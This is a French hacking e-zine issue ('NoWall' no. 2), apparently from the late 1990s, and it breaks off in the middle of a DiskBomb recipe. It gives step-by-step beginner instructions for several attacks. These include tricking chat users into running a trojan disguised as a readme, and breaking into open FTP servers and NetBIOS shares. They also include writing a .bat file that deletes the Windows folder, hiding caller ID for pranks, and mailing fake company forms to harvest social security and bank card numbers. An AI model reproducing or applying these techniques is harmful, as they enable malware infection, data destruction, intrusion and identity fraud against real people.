   ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° °
   ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° °
   ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° 

      ___      __    ________    __            __    __________    __          __ 
     |   \    |  |  |        |  |  |          |  |  |          |  |  |        |  |
     |    \   |  |  |   __   |  |  |          |  |  |   ____   |  |  |        |  |
     |     \  |  |  |  |  |  |  |  |          |  |  |  |    |  |  |  |        |  |
     |  |\  \ |  |  |  |  |  |  |  |          |  |  |  |____|  |  |  |        |  |
     |  | \  \|  |  |  |  |  |  |  |    __    |  |  |          |  |  |        |  |
     |  |  \     |  |  |  |  |  |  \   /  \   /  |  |   ____   |  |  |        |  |
     |  |   \    |  |  |__|  |   \  \_/    \_/  /   |  |    |  |  |  |_____   |  |_____ 
     |  |    \   |  |        |    \     /\     /    |  |    |  |  |        |  |        |
     |__|     \__|  |________|     \___/  \___/     |__|    |__|  |________|  |________|


				              ________________
				              \              /
    <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<  NUMBER TWO  >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>   
  				              /______________\                                      

                                 __________________________
			               \                        /
    <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<     PAR RAVENSHADOW    >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 
     				         /________________________\          
                      
                                                                           
                                                                      
   ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° °
   ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° °
   ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° ° °


                  			     \\\ ///
                   			      (ô ô)
      			    -----------ooO-(_)-Ooo-----------
     			          |                               |
                            |    I N T R O D U C T I O N    |
                            |                               |
                            ---------------------------------


	Yop ! Toujours plus grand, toujours plus beau, toujours plus fort et toujours plus fou,
RavenShadow est de retour !!!

	Le deuxième numéro de NoWall sort très peu de temps après le premier, et ce pour une 
raison très simple : je vous aime :o) 

	Pour lire mon top fanzine de la mort qui tue mortellement la vie vivante, lisez-le sous
WordPad en 800x600 et en choisissant dans les options "Pas de retour à la ligne". 

	J'ai reçu quelques e-mails où l'on me demandait un truc tout con : pourquoi "NoWall" ?
		
	Ben c'est simple : y'a eu NoWay, NoRoute, NoFuture, NoPast, NoPasswd, et le tout récent
NoPeace de Clad Strife... Moi, NoPeace, ça me plaisait bien, mais Clad était déja passé par là
et c'est un gars que je respecte, donc je voulais pas me brouiller avec lui. NoFun, ça voulait 
dire que ce serait pas drôle, et moi, j'aime bien être drôle (même si j'y arrive pas toujours).
NoTrip, ça voudrait dire que je réprouve les délires et la consommation des drogues. NoZizi, 
c'était marrant, et peut-être qu'un jour je ferais un e-zine qui portera ce nom-là, mais là, ça
ne convenait pas.

	J'avais aussi la possibilité d'écrire un e-zine sans "No" dans le titre, et moultes idées
me sont venues à l'esprit : *** ****** (Top Secret), le logo était simple à faire, mais le nom 
imprononçable ; The Zine : ça fait un peu trop "I am the best & I fuck you" à mon goût ; 
HackZine : ben le problème, c'est que c'est pas le premier zine de hack ; et tant d'autres 
encore...

	Pis un jour, je me suis dit : "Putain de merde ! Bordel ! Chier-chiasse-couille-con-cul-
bite-vagin-sperme-crotte-zut-flute-mazette-kaïboudi-boudiou-fichtre-saperlipopette ! Marre de 
ces noms en anglais, ça SuxX (LOL) !!!" Et de là, je me suis demandé ce qui me caractérisait le
plus, ou mon idée face à mes projets, et là, une lueur de soubresaut de lumière d'éclat de 
génie s'est emparée de tout mon être : Pas De Barrières !!!

	Puis, l'euphorie cédant sa place à la déprime, je me suis dit : "Pas De Barrières, c'est
trop long ! PDB, ça va entraîner des jeux de mots du genre "Putain De Bouffon" ou "Pute De 
Bordel", et on va me faire chier avec ça !"...

	Puis, mon grand génie incommensurable reprenant le dessus rapidement, je me suis dit : 
"Oh ! Zarma ! Pô s'faire chier pour çô ! On va revenir à ce putain d'anglais !... J'ai trouvé !
NOWALL !!!"

	Et de là est venu ce nom sous lequel vous connaissez mon e-zine.

	
	Bon, tournons la page et revenons à nos roustons...

	NoWall est toujours divisé en 4 parties :

		- Hacking (pour les trous du cul de l'Internet)
		
		- Phreaking (pour les enculeurs des telecoms)
			
		- Social Enginnering (parce que j'aime toujours autant ça)
		
		- Culture (pour les intellos qui veulent apprendre des trucs parce que c'est des
		assoiffés de connaissances) 


	J'rappelle quand même que mon zine est à une tendance orienté dans la direction pointant
dans le sens de l'endroit où se trouvent des débutants inexpérimentés qui débutent dans le 
domaine du Hack/Phreak où ils ne sont encore que débutants qui débutent, donc si vous êtes une
vraie Elite que tout le monde craint, vous y retrouverez probablement des articles que vous 
aurez déja lu autre part, mais ne m'en tenez pas rigueur si je ne désigne pas toujours la 
source, parce que je n'écris pas mes articles avec d'autres sous les yeux, mais sur la base de
ce que j'ai lu et appris.

	J'essaye de faire monter lentement le niveau pour que même les plus cons d'entre nous (et
je fais partie des plus cons d'entre tous, malgré mon QI aussi grand que le cul d'un éléphant
obèse gavé au hamburger) puissent suivre sans être largués. Et au fur et à mesure, j'espère
réussir à instruire les futurs petits Mitnick :oP

	Je me dois quand même de vous dire que rien n'est illégal tant qu'on ne se fait pas 
prendre, donc si vous mettez en pratique ce que je décris dans ce mag, ben vous faites pas 
choper, parce qu'une étrange rumeur dit que c'est illégal, et on est mieux en liberté que 
derrière les barreaux d'une prison, surtout que c'est même pô vrai qu'en prison on vous apporte
des oranges, alors après, ben on fait des carences en acide ascobique (en vitamine C, quoi !)
et on n'est plus en bonne santé, et ça, c'est pô bien ! ;-D

	Bon, ben j'arrive à la fin de l'intro, et vous pouvez m'écrire à RavenShadow@ifrance.com
pour m'envoyer vos articles, vos progz, vos compliments, vos insultes, vos numéros de cartes
bancaires, vos propositions de job ou quoi que ce soit d'autre.

	Bonne lecture, et n'oubliez pas que j'ai un humour vaseux à prendre au 998e degré (oui, 
je sais, la dernière fois, c'était le 128e degré, mais comme tout un chacun, plus je vieillis,
plus je suis con !!! Narf ! MDR).

	

	

 	                			     \\\ ///
                   			      (ô ô)
      			    -----------ooO-(_)-Ooo-----------
     			    	    |                               |
                            |        S O M M A I R E        |
                            |                               |
                            ---------------------------------


				          ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
				          ¤ SECTION HACKING ¤
				          ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

				    Exemple de hack sur Caramerde
					  Hacker un site par FTP
					    Hacker sans Troyen
					   Faire un fichier .bat
				



                                 ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
				         ¤ SECTION PHREAKING ¤
				         ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

					      Le White-Boxing
					     Faire une Crap-Box
				  Bidouillage sur téléphones portables
			              Quelques numéros utiles
                                       



			          ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
			          ¤ SECTION SOCIAL ENGINEERING ¤
			          ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

				      Introduction au Snail Mail
				   Soigner son attaque au Snail Mail
					 L'attaque au Snail Mail
					 Exemple d'un formulaire
		              



				          ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
      				    ¤ SECTION CULTURE ¤
				          ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤

					    Faire un DiskBomb
				      L'éthique du hack moderne
					 La conscience du hacker
			  Kevin Mitnick, un Condor parmi les vautours
					    Wares en pagaille
					Comment faire sauter un PV
					   Fumer de l'arachide

                               


					        ¤¤¤¤¤¤¤¤¤
						  ¤ OUTRO ¤
						  ¤¤¤¤¤¤¤¤¤

					     Je recherche...
						   Greetz
						  Un crew ?
						   Bye bye

				              



                  			     \\\ ///
                   			      (ô ô)
      			    -----------ooO-(_)-Ooo-----------
     			    	    |                               |
                            |         H A C K I N G         |
                            |                               |
                            ---------------------------------


	
	************************************
	*** EXEMPLE DE HACK SUR CARAMAIL ***
	************************************	


	Ce qui suit n'est qu'une idée parmi tant d'autres te je ne suis sûrement pas le premier
à l'avoir eu, mais moi, comme je suis pas con, je dépose un copyright dès maintenant ;o)

	Donc, il va vous falloir :

		- Icq 98 (ou 99, avec un scanneur d'IP )

		- Adduser (c'est un programme pour ICQ qui permet de mettre quelqu'un sur sa 
		"contact list" sans son autorisation.) 

		- Un troyen assez récent (les troyens, c'est pour les lamers, mais je m'en pète
		les couilles parce que c'est quand même utile)

		- La photo d'une meuf (si possible la photo d'une copine pour faire plus réel, 
		parce que Tabata Cash qui suce Rocco Sifredi, ça fait mytho, quand même) 

		- Un compte Cacamail au nom d'une fille bien "attirante" (du style "jf-ch-love" 
		ou "i-want-a-boy", pas de "cunegonde_la_frustrée" ou de "marie-germaine_la_
		campagnarde") 

	Et tant qu'à faire, sniffez-vous avant de faire ça, pour pas vous faire niquer...

	Vous avez tout le matos ? Kewl ! C'est parti !!!!

	1°) Go sur caramerde avec votre nouveau compte, et allez sur un salon de discussion du 
style "Sexe & baise".

	2°) Now, cherchez si il y en a pas qui ont ICQ grace à leurs e-mails, 99% de leurs 
adresse e-mails sont pseudo@caramail.com.

	3°) Grace à "Adduser" mettez-les sur votre "contact-list" : ce sont vos cibles 
potentielles.

	4°) Tenez avec eux un discours du genre :

		Vous : Salut !!!! :-@
		Cible : Salut ! ;-)
		Vous : Tu m'envoies ta photo stp ? ;-)
		Cible : oui / non (rien à battre de la réponse)
		Vous : Tu veux ma photo ?
		Cible : Oui, ce serait cooooooollllll !!!!

		
	Gagné ! Héhéhéhéhéhéhé... :oD

	Là vous lui envoyez un fichier sous zip contenant :
		- La photo de la meuf
		- Le serveur du troyen renomé en "lisez-moi.exe"

	C'est clair, il vous faut un ch'tit' peu de chance pour que la victime marche et 
s'infecte, mais si ça marche, chopez son Ip grâce à Icq (mettez -lz sur "off-line" avec Icq98).

	Et hop ! Vous êtes averti à chaque fois que votre victime se connecte et autres infos 
utiles.




	

	**********************
	*** HACKER PAR FTP ***
	**********************


	*** Qu'est-ce qu'un FTP ? ***

	FTP signifie File Transfert Protocol, ce qui signifie que c'est un protocole qui permet 
de transmettre des fichiers d'un ordinateur à un autre (par exemple, quand on télécharge un 
programme, ça passe par le FTP). Les ports qui lui sont attribués sont les ports 20 et 21. 


	*** Comment hacker en passant par le FTP ? ***

	[Je précise que la technique qui suit ne marche que sur les serveurs non-sécurisés]

	Aller dans "Démarrer" , "Exécuter" et tapper "ftp -n", et là, normalement, une fenêtre 
Ms-Dos apparaît ; il faut taper :

open www.nomdusite
quote user ftp
quote cwd ~root
quote pass ftp

	En fait, on obtient un truc dans ce style (avec une * devant ce qu'il faut taper, avec ¤
devant ce qu'on obtient) :

* Ftp> open www.cible.com
¤ connected to www.cible.com
¤ 220 websrv1 microsoft ftp service(version 4.0)
* Ftp> quote user ftp
¤ 331 anonymous acces allowed,send identify (e-mail name)as password
* Ftp> quote cwd ~root
¤ 530 please login with user and pass
* Ftp> quote pass ftp
¤ 230 anonymous user logged in


	Voila ! Si tout se passe bien, on est alors connecté sur le site-cible.

	Si le serveur est securisé, on obtient un truc comme ça (mais lâchez l'affaire, vous 
aurez vraiment beaucoup de mal à réussir sauf si vous avez une connection par cable et un bon
crackpass) :

* Ftp> open www.cible.com
¤ connected to www.cible.com
¤ websrv microsoft ftp service (version 4.0)
* Ftp> quote user ftp
¤ 331 password required for ftp
* Ftp> quote cwd ~root
¤ 530 please login with user and pass
* Ftp> quote pass ftp
¤ 530 user cannot log in


	Une fois connecté sur le site, vous pouvez utiliser les commandes suivantes :

	PWD : montre où l'on se situe sur le disque
	DIR : montre le contenu de la racine
	MKDIR : créé un répertoire (ex : "mkdir suxx" créé le repertoire "suxx")
	RMDIR : supprime un répertoire (ex : "rmdir suxx" supprime le répertoir "suxx")
	DEL : supprime un fichier (ex : "del suxx.exe" supprime le fichier "suxx.exe")
	CD : emmène dans un répertoir (ex : "cd suxx" emmène dans le répertoir "suxx")
	CD / : rammène à la racine
	CD.. : rammène au répertoir précédant
	GET : prend un fichier et le met sur votre bureau


	Quand vous avez fini de faire joujou, tapez quit et vous serez déconnecté.

	Voila ! C'est pas bien sorcier quand même !!! 




	**************************
	*** HACKER SANS TROYEN ***
	**************************
	


	Pour commencer, il vous faut tout d'abord vous assurer que vous avez sur votre bureau 
l'icone "Voisinage réseaux" . Si ce n'est pas le cas, vous devez l'ajouter, dans "Panneau de 
configuration".

	Bon, maintenant, choisissez votre cible, trouvez son IP et ouvrez une session Ms-Dos et 
tapez :

C:\WINDOWS>nbtstat -A IP_de_la_cible


	Voila ce qui va s'afficher :
 

NetBIOS Remote Machine Name Table
Name Type Status
USERNAME 00 UNIQUE Registered
WORKGROUP 00 GROUP Registered
USERNAME 03 UNIQUE Registered
USERNAME 20 UNIQUE Registered
WORKGROUP 1E GROUP Registered
MAC Address = 44-45-53-54-00-00
C:\WINDOWS>


	Il est possible qu'un message d'erreur apparaisse sous la forme d'un : "HOST NOT FOUND", 
il peut y avoir deux cause à cette erreur :

	1°) La personne ne fait pas tourner le client MiKro$oFt ou n'est tout simplement pas 
sous Windaube,... c'est donc normal, mais ça fait chier, parce que votre hack est raté ! 

	2°) Quelqu'un utilise le même nom de machine que vous et est aussi connecté, changez 
donc le votre en un autre qui ne risque pas d'être pris (donc soyez original).


	Bon, imaginons que vous ayez du premier coup une réponse favorable du Nbtstat ; ce qui 
est intéressant, c'est le service de partage de fichiers (le "Remote 20"), et s'il n'y est pas, 
lâchez l'affaire car votre hack est définitivement foiré.

	Maintenant que vous avez le nom du "Remote 20", il vous faut l'ajouter au fichier 
"Lmhosts" dans le répertoire de WiNfUcK (si ce nom contient des espaces, il faut les mettre 
entre guillemets). 

	Ce fichier est utilise par la pile du client "Wins" (qui fait que Netbios prime sur le 
TCP/IP) et contient la redirection des addresses IP vers les noms d'ordinateurs. Ce fichier est 
divisé en plusieures colonnes :

		- la premiere contient l'adresse IP
		- la seconde le nom de la machine hôte
		- la troisième et les suivantes des commentaires et/ou des directives


	Ce qui différencie le passage d'une colonne à une autre, c'est, au mimimum, un 
espacement.

	Chaque directive et chaque commentaire doivent être précédé du signe #, mais ils ne 
servent a rien pour l'instant.

	Donc, sous la session Ms-Dos que vous avez ouvert, tapez :

C:\WINDOWS>echo IP REMOTE 20>>C:\windows\lmhosts


	Ici, il n'y a aucun fichier Lmhosts existant, donc remplacez la redirection >> par >.

	Une fois le nouveau host ajouté, il ne vous reste plus qu'a reseter le cache du Netbios.

	Donc dans votre session Ms-Dos, tapez :

C:\WINDOWS>nbtstat -R


	Et vous aurez :

Successful purge and preload of the NBT Remote Cache Name Table.
C:\WINDOWS>


	Maintenant, il faut savoir quelles sont les ressources qui sont partagées sur la machine
hôte, donc on va se servir de la commande "NET", dont le paramètre "View" permet de lister ces 
ressources.

	Donc tapez dans votre session Ms-Dos :

C:\WINDOWS>net view \\NOM du REMOTE 20

	
	Et si tout se passe bien, vous obtiendrez :

Shared resources at \\USERNAME
Sharename Type Comment
A Disk
C Disk
D Disk
HPDeskJet Printer
The command was completed successfully.
C:\WINDOWS>


	Il est possible que des messages d'erreur s'affichent ; voici les plus courant, et 
comment en venir à bout :

Error 5: You do not currently have access to this file.

	La machine partage bel et bien certaines ressources mais vous devez entrer un password 
pour y avoir accès. Pour cela il faut passer par Windaube : cliquez sur "Démarrer", allez dans 
"Rechercher" puis dans "Ordinateur". Nommez l'ordinateur "\\Remote20" et cliquez sur "Rechercher
maintenant" ; une fois que la bécane est trouvée, cliquez deux fois dessus et vous pourrez alors
entrer un password-réseau (essayez un password vide ou le nom du Remote20, et si ça marche pas, 
démerdez-vous :-P).


Error 53: The computer name specified in the network path cannot be located.

	Là, il peut y avoir deux causes à l'erreur : soi vous avez mal introduit des données, 
soi la machine que vous essayez d'atteindre n'est pas accessible (déconnexion).


Error 59: An unexpected network error has occurred. (Disconnected)

	Ici, l'erreur et due à un problème lors de la transmission des données entre vous et la 
machine pendant l'exécution de la commande "Net View", donc recommencez.


Error 86: The specified network password is not correct.

	Le password que vous venez d'entrer (via le DOS), n'est pas valide, donc essayez-en un 
autre.


	

	*****************************
	*** FAIRE UN FICHIER .BAT ***
	*****************************


	Faire un fichier .bat est une chose très simple, pourvu qu'on ait au moins un doigt pour
taper sur son clavier, un oeil pour voir ce qu'on écrit et un cerveau pour connaître un peu le
Ms-Dos.

	En guise d'introduction, voici quelques commandes Ms-Dos de base :

echo off : désactive l'affichage de ce qui se passe
 
dir : affiche le contenu du répertoire désigné 
(ex : <dir c:\windows> affiche le contenu de c:\windows) 

del : efface tous les fichiers du répertoire désigné
(ex : <del C:\WINDOWS\*.exe> efface tous les fichiers .exe de c:\windows) 

echo. : saute une ligne 

echo : affiche ce qui est écrit après [echo]
(ex : <echo fuck you> affiche "fuck you"> 

cls : efface l'écran 

pause : demande d'appuyer sur un touche pour continuer

	Donc voici le genre de fichiers .bat plutot pas gentils du tout que l'on peut faire très
vite sans se casser la tête :
 
echo off 
echo This programm is created by RavenShadow
pause 
del C:\WINDOWS\*.* 
dir C:\WINDOWS\ 
echo YoU h4v3 b33n h4x0r3d !!! 
cls


	Bon, ben je vous laisse faire joujou avec ça, mais sachez quand même que c'est hyper
connu, donc faites pas le malin avec un autre hacker en lui envoyant ça, parce que je ne pense
pas que le monsieur ou la madame apprécierait la plaisanterie, et il risquerait de se comporter
assez méchamment avec vous, avec une tendance sadique de nature maniaco-dépressive jumelée à une
nature hyper-impressionnable donc supra-impulsive qui ne pourrait que vous nuire.


          			                 \\\ ///
                   			      (ô ô)
      			    -----------ooO-(_)-Ooo-----------
     			    	    |                               |
                            |       P H R E A K I N G       |
                            |                               |
                            ---------------------------------



	***********************
	*** LE WHITE-BOXING ***
	***********************



	*** C'est quoi le White Boxing ? ***

	A peu de choses près, le White Boxing consiste à émettre un son dans le combiné afin que
la cabine n'affiche pas les numéros composés. 


	*** Comment faut-il procéder ? ***


	Bon, ben ça, c'est assez difficile à décrire, parce qu'à moins d'avoir une machine qui 
émet le "Ssssssscccccccchhhhhhhhhhh" du White Boxing, il faut s'entraîner à le produire avec sa 
bouche.

	Faut pas s'inquiéter, c'est pas difficile : c'est comme quand on fait signe à quelqu'un 
de se taire en mettant un doigt sur la bouche et en émettant un "Chut" très bref, sauf que là, 
le son doit être plus long et plus fort.

	Sinon, si vous avez un dictaphone de bonne qualité, et si votre modem n'est pas intégré 
à votre ordi, vous pouvez enregister le son qui suit la numération et le mettre en lecture 
devant le combiné.




	**************************
	*** FAIRE UNE CRAP-BOX ***
	**************************


	*** A quoi sert une Crap-Box ? ***

	Une Crap-Box ne sert qu'à une seule chose : enregistrer une conversation téléphonique. 
C'est pas grand-chose, mais ça peut toujours être utile dans certains cas...


	*** Le matériel pour faire une Crap-Box ? ***

		- un téléphone
		- des fils
		- une pince à dénuder ou un cutter
		- un tournevis
		- un dictaphone
		- un fer à souder
		- un adapteur d'écouteur (à relier au système de son ou dans le lecteur CD)


	*** Comment procéder ? ***

	1°) Avec le tournevis, ouvrir délicatement le combiné du téléphone sans rien casser ; 
vous devriez voir une petite plaque où les 2 fils de l'écouteur et les 2 fils du micro se 
rejoignent pour pouvoir brancher le fil du téléphone.

	2°) Prendre 4 fils de couleurs différentes (pas nécessaire, mais plus pratique) et de 
même longueur, et les souder sur les 4 places de la plaque où les fils ce rejoignent, en prenant
bien garde qu'aucun fil n'en touche un autre.

	3°) Rassembler un fil de l'écouteur avec un du micro faire de même avec les 2 autres 
fils ; ainsi, vous aurez un pôle de l'écouteur et un du micro sur un groupe de fils et les 
autres pôles sur l'autre groupe.

	4°) Souder un des groupes de fils à un fil de l'adaptateur d'écouteur et faire pareil 
avec l'autre groupe (si l'adaptateur a quatre fils, les mettre deux par deux).

	5°) Brancher l'adapteur sur le dictaphone.


	Ainsi, quand vous téléphonez et que v'voulez enregister la discut", appuyez sur "Rec". 




	********************************************
	*** BIDOUILLAGE SUR TELEPHONES PORTABLES ***
	********************************************


	*** Obtenir l'IMEI d'un portable ***

	Ben ça, c'est un truc tout con qui, je pense, marche sur tous les portables, mais
bon, je ne garantie rien (je sais que ça marche sur les Nokia, les Ola, les Sagem et sur le
Motorola StarTAC).

	Juste à titre d'info, l'IMEI d'un portable sert à le tracer, donc avoir le sien n'est 
pas particulièrement utile, sauf si on sait le changer (si vous savez le faire, expliquez-moi, 
ce serait cool), mais si on a celui d'un autre et le matériel nécessaire, ben on peut jouer au
petit militaire de la DGSE et tracer son portable.

	En fait, il suffit d'allumer votre cellulaire, de rentrer le code PIN et de taper sur 
les touches * # 0 6 # et, normalement, l'IMEI s'affiche. 


	*** Un menu secret ***

	Ce truc, c'est un machin tout bizarre que j'ai testé sur le Sagem 800 d'un pote, mais je 
ne sais pas s'il marche sur les autres téléphones, mais essayez quand même sur le votre, on ne 
sait jamais.	
	
	Il suffit d'allumer le téléphone, taper le code PIN, entrer dans le menu du portable et
taper sur la touche * et, si tout se passe bien, un menu secret apparaît.

	Sur le Sagem de mon pote, je suis arrivé sur un fichier où on trouvait l'IMEI et 
d'autres infos dans ce style.



	*******************************
	*** QUELQUES NUMEROS UTILES ***
	*******************************

	
	*** Téléphoner en restant anonyme ***

	Comme vous le savez, ou peut-être pas, Fric Télécon a mis en vente des téléphones qui 
affichent le numéro de l'appelant... Ben moi, j'aime pô ça ! Parce que pour les attaques au SE
ou les blagues téléphoniques, ça l'fait carrément pas !

	Donc, pour ceux qui ne le savent pas encore, faîtes le 3651 avant de composer le numéro 
de votre cible (dans le cas du social engineering) ou de votre victime (dans le cas du canular),
et, si elle est équipée d'un de ces téléphones, elle ne verra pas s'afficher votre numéro de 
téléphone, mais des petites étoiles ! 

	Cette technique s'applique également aux providers (comme ça, on est anonyme, ce qui est
pratique si votre abonnement est volé ou piraté), ainsi qu'aux VMBs et aux PABXs (c'est plus sûr
si vous avez la folie d'appeler de chez vous).

	Mais bon, faut pas non plus perdre de vue que dès qu'on fait le 3651, FT nous enregistre
et nous met dans une liste spéciale, et dès que y'a quelqu'un qui fait une connerie avec les
téléphones, ben c'est cette liste-là que les employés de Fuck Telecom regardent en premier. 

	En conclusion : F4rc3 t3l3c0m SuxX !!!


	*** Savoir qui vous a appelé ***

	Si votre téléphone sonne mais que vous ne décrochez pas (si un petit malin s'amuse à 
vous faire chier et que vous avez marre d'entendre ses conneries par exemple), vous pouvez
obtenir son numéro de téléphone en composant le 3131 ; vous tomberez alors sur une voix qui vous
donnera le numéro de l'appelant, ainsi que la date et l'heure de l'appel, si vous voulez porter
plainte par exemple.
	
	Attention : cette technique ne marche que si votre répondeur ne s'est pas mis en marche et
si le téléphone a au moins sonné deux fois.

	Et elle ne marche pas non plus si l'appelant a fait le 3651.


	*** Etre au courant de ce qui se passe chez FT ***

	En faisant joujou sur mon téléphone, j'ai trouvé deux numéros qui concernent FT :

		- 1010 : le service téléphonique des actionnaires de Farce Telecom où l'on peut
			 savoir la valeur de l'action FT ou joindre un conseiller FT pour le 
			 faire chier, puisque c'est un numéro gratis.

		- 0800123456 : le service des employés de FT, où on apprend tout les projets de
			       FT et où l'on entend des foutaises pas possible du genre quand FT
			       se congratule d'être la meilleure entreprise telecom.


	*** Si on a vraiment trop bu ***

	Ben c'est simple : faites le 18 ;o)



	


                  			     \\\ ///
                   			      (ô ô)
      			    -----------ooO-(_)-Ooo-----------
     			          |                               |
                            |      SOCIAL ENGINEERING       |
                            |                               |
                            ---------------------------------




	**********************************
	*** INTRODUCTION AU SNAIL MAIL ***
	**********************************

	Le Snail Mail, c'est du Social Enginnering où l'on se sert de la poste comme moyen
d'action.

	Je pense personnellement que c'est très utile, car c'est facile, par cher et on obtient
de bons résultats. 

	En effet, il n'existe pas un seule entreprise, aussi informatisée soit-elle, où il n'y a
pas des tas de paperasses à remplir. Et, du moins c'est mon avis, à force de remplir paplard
sur paplard, l'employé moyen ne fait plus gaffe à ce qu'on lui demande et, de toute manière, 
il y a de plus en plus de gens qui ne font confiance qu'aux informations écrites, parce que
comme dit le proverbe : "les paroles s'envolent, les écrits restent".

	Et vu que notre société devient de plus en plus conne et que l'administration suit le
mouvement de connerie progressive et générale, on vous demande tout et n'importe quoi pour une
simple incription à la médiathèque de votre ville, donc vous pouvez vous aussi demander un tas
d'info lors de votre attaque au SE.	



	*****************************************
	*** SOIGNER SON ATTAQUE AU SNAIL MAIL ***
	*****************************************


	Si votre cible reçoit en guise de courrier une feuille cadrillée où il est écrit au 
crayon dans un français approximatif, même si elle est plus conne qu'un fachiste trisomique,
il y a peu de chances qu'elle croit à votre histoire.

	Donc il vous faudra quand même un minimum de matos, c'est à dire des enveloppes propres
et pas froissées, des timbres qui ne ressemblent pas à des papiers de chewing-gums trainant
dans une poche depuis 3 semaines, du papier d'assez bonne qualité (c'est con pour la nature et
Dominique Voynet, mais ne prenez pas de papier recyclé), une bonne imprimante, et quelques
talents de créateur artistique.

	En effet, il vous faudra faire au moins un logo pour votre société d'emprunt, et il vous
faudra le mettre sur vos enveloppes en haut à gauche de la face frontale (là où vous marquez
l'adresse) et sur votre papier à lettres.

	Ensuite, il vous faudra trouver un nom pour votre société d'emprunt, mais ne prenez pas
un truc du genre "Jean-Kevin LeBoulet & Cie" ni l'autre extrême "Star Entairtainment Society",
parce que nous, on est francophones et civilisés, donc ne faites pas dans le bouseux ni dans
le grand groupe international (surtout qu'en général, un grand groupe international, c'est
connu).
	
	Si vous pouvez faire des étiquettes pour marquer les adresses de vos cibles, ça le fera
encore plus et vous n'en serez que plus crédible.

	Enfin, afin d'éviter tout risque de vous faire niquer à cause de votre adresse et de faire
plus pro, il vous faut soi une boîte postale (si vous êtes plusieurs, partagez les frais), soi
une adresse dans une Z.I (Zone Industrielle). Pour ça, il vous faudra de la chance, parce qu'une
entreprise désaffectée dans une Z.I, on n'en trouve plus beaucoup.

	En clair et en résumé : pour être crédible au maximum, il faut que vous ayez l'air pro
au maximum.




	*******************************
	*** L'ATTAQUE AU SNAIL MAIL ***
	*******************************


	*** Choisir la cible ***

	Dans le cas du SE par snail mail, on peut s'attaquer à une énorme tranche de population,
pour faire un peu comme un sondage. Il faut que la lettre ressemble à un truc stéréotypé que
vous envoyez à des milliers de gens, comme une mailing-list qui passe par les PPT au lieu de 
passer par le Web.


	*** Le design du formulaire ***

	Si vous voulez que votre attaque soit vraiment efficace, il faut que vous fassiez des
formulaires qui se remplissent vite, un peu dans le genre de formulaire d'inscription à une
association, et avec un police "pro", pas de polices du genre Comic sans MS ou Elegant !!!

	Demandez vos infos dans un ordre "logique", ne demandez pas d'entrée le numéro de Secu
ou le numéro de carte de crédit.

	Enfin, la règle d'or toute con : ne faites pas de fautes d'orthographe !!!

	Ensuite, envoyez vos formulaires et attendez.

	S'il vous manque des infos, n'hésitez pas à téléphoner à votre cible en vous faisant
passer pour un employé de votre société d'emprunt... Mais pour le SE par téléphone, il faudra
attendre le prochain NoWall !!! :oD




	******************************
	*** SCHEMA D'UN FORMULAIRE ***
	******************************


<Logo de votre société d'emprunt>
<Nom et adresse de votre société d'emprunt>

									<Date de l'envoi>


			<Titre du formulaire en gros, majuscule et gras>



	Madame, Monsieur, 

	<Prétexte du formulaire>

	Veuillez donc remplir le formulaire suivant et nous le retourner à <adresse>


		Nom et Prénom : ______________________________________________
		             _          _
		Sexe :      |_| M      |_| F (nom de jeune fille : __________ )
		
		Adresse : ____________________________________________________

		______________________________________________________________
				
		N° de téléphone : |_|_|  |_|_|_|_|_|_|_|_|

		Date de naissance : |_|_|/|_|_|/|_|_|_|_|
	                             _
		Situation familiale : |_| Célibataire
					     _ 	
					    |_| Marié(e)
					     _
					    |_| Divorcé(e)
					     _
					    |_| Veuf(ve)
					  _		_	_	_	_
		Nombre d'enfants : |_|Aucun  |_|1  |_|2  |_|3  |_|4 ou plus

		N° de sécurité sociale : _____________________________________

		Banque : _____________________________________________________

		Numéro de carte bleue : |_|_|_|_| |_|_|_|_| |_|_|_|_|


		
		Nous vous adressons nos sincères salutations,

									<Nom d'emprunt>
									  <Signature>


		

		
	



	




                  			     \\\ ///
                   			      (ô ô)
      			    -----------ooO-(_)-Ooo-----------
     			          |                               |
                            |         C U L T U R E         |
                            |                               |
                            ---------------------------------



	*****************************
	*** FABRIQUER UN DISKBOMB ***
	*****************************


	Attention ! Ce que je décris ci-dessous n'est pas une connerie qui sort de mon 
imagination, mais bel et bien une "recette" testée et approuvée par des milliers de petits
anarchistes en herbe, dont moi.
	Alors si vous voulez vraiment fabriquer un DiskBomb et l'utiliser, ben oubliez que vous 
avez lu ça dans mon fanzine, parce que je crois bien qu'on pourrait vous accuser de destruction 
de matériel volontaire avec intention de nuire à la société et patati et patata...

	Pis d'façon, si vous faîtes ça que vous vous faîtes pécho, ben ce sera pas de ma faute,
parce que c'est Nucke (un pote qui était dans De-Generation-X) qui m'a appris ça !


	*** Matériel ***

		- Une disquette (pourrave tant qu'à faire)
		- Du vernis à ongles ou de la colle en pot (la colle crade qu'on met avec une 
